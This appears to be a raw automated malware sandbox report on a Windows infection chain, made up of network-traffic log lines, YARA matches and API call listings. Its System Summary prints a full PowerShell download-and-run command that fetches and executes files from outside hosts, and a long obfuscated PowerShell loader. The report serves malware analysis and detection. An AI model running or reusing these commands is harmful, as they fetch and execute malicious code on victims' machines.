                        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49718 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.6:49729 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.6:49748 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.6:49789 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.113.195.132:443 -> 192.168.2.6:49814 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49887 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49968 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50041 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50042 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50043 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50044 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50046 version: TLS 1.2
                        Source: wmpnscfg.exeBinary or memory string: NtUserGetRawInputData
                        Source: Yara matchFile source: 24.3.svchost.exe.5950000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.msiexec.exe.243c0000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.msiexec.exe.241a0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.5730000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.msiexec.exe.243c0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.5950000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000018.00000003.2903015148.0000000005950000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2899229547.00000000243C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.2902818252.0000000005730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2899023671.00000000241A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A908CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,25_3_00007DF415A908CC

                        System Summary

                        barindex
                        Source: amsi32_7832.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7832, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E3E8 NtAcceptConnectPort,25_3_00007DF415A9E3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E3C8 NtAcceptConnectPort,25_3_00007DF415A9E3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E170 NtAcceptConnectPort,25_3_00007DF415A9E170
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E150 NtAcceptConnectPort,25_3_00007DF415A9E150
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E094 NtAcceptConnectPort,25_3_00007DF415A9E094
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9F32C NtAcceptConnectPort,free,25_3_00007DF415A9F32C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E25C NtAcceptConnectPort,25_3_00007DF415A9E25C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,25_3_00007DF415A9F180
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,25_3_00007DF415A9E910
                        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000020D09DC15C0 NtAcceptConnectPort,25_2_0000020D09DC15C0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000020D09DC1CF4 NtAcceptConnectPort,CloseHandle,25_2_0000020D09DC1CF4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_3_00007DF4DF3A1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,32_3_00007DF4DF3A1CE8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_3_00007DF4DF3A1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,32_3_00007DF4DF3A1958
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422EC8 NtAcceptConnectPort,32_2_0000024465422EC8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422DDC NtAcceptConnectPort,32_2_0000024465422DDC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422E84 NtAcceptConnectPort,32_2_0000024465422E84
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542290C NtAcceptConnectPort,32_2_000002446542290C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465423158 NtAcceptConnectPort,32_2_0000024465423158
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422A20 NtAcceptConnectPort,32_2_0000024465422A20
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422DAC NtAcceptConnectPort,32_2_0000024465422DAC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422D80 NtAcceptConnectPort,32_2_0000024465422D80
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465422CAC NtAcceptConnectPort,32_2_0000024465422CAC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3B2E90 NtQuerySystemInformation,malloc,NtQuerySystemInformation,32_2_00007DF4DF3B2E90
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3E25D4 NtQuerySystemInformation,NtQuerySystemInformation,32_2_00007DF4DF3E25D4
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD33FEB8D210_2_00007FFD33FEB8D2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD33FEAB2210_2_00007FFD33FEAB22
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD33FE4BAD10_2_00007FFD33FE4BAD
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04D9E6A816_2_04D9E6A8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04D9EF7816_2_04D9EF78
